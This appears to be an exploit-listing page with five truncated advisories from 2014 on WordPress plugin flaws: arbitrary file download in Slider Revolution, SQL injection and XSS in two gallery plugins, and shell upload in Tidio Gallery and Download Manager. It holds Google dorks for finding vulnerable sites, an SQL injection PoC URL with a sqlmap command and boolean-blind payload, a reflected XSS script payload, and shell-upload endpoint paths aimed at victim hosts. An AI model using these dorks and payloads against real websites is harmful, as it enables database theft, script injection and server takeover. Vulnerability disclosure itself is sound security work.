Vuln. discovered

WordPress Slider Revolution <= 4.1.4 Arbitrary File Download vulnerability

###################### # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Link : Premium plugin # Dork Google: revslider.php "index of" # Date : 2014-07-24 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability ###################### # PoC http://victim/wp-admin/admin-ajax....

WordPress Video Gallery 2.5 SQL Injection/XSS Vulnerabilities

###################### # Exploit Title : WordPress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery # Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip # Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf (Click on "Repeat the search with the omitted results included") # Date : 2014-07-15 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1....

WordPress Gallery Objects 0.4 SQL Injection

###################### # Exploit Title : WordPress Gallery Objects 0.4 SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://galleryobjects.com/ # Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip # Dork Google: inurl:/admin-ajax.php?action=go_view_object # Date : 2014-07-18 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### Poc via Browser: http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html sqlmap: sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid --- Place: GET Parameter: viewid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html --- ##################### Discovered By : Claudio Viviani http://www....

WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities

###################### # Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.tidioelements.com/ # Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip # Date : 2014-07-14 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell ###################### # Vulnerablity n°1: XSS Reflected Unauthenticated http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script> # Vulnerablity n°2: Unprivileged user like subscriber could upload shell script....

WordPress Download Manager 2.6.8 Shell Upload Vulnerability

###################### # Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : www.wpdownloadmanager.com # Software Link : http://downloads.wordpress.org/plugin/download-manager.zip # Date : 2014-07-11 # Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version # # # WORK ONLY ON SERVER WITH .HTACCESS FILES DISABLED ###################### # Location : http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php ###################### # Description : WordPress Download Manager 2....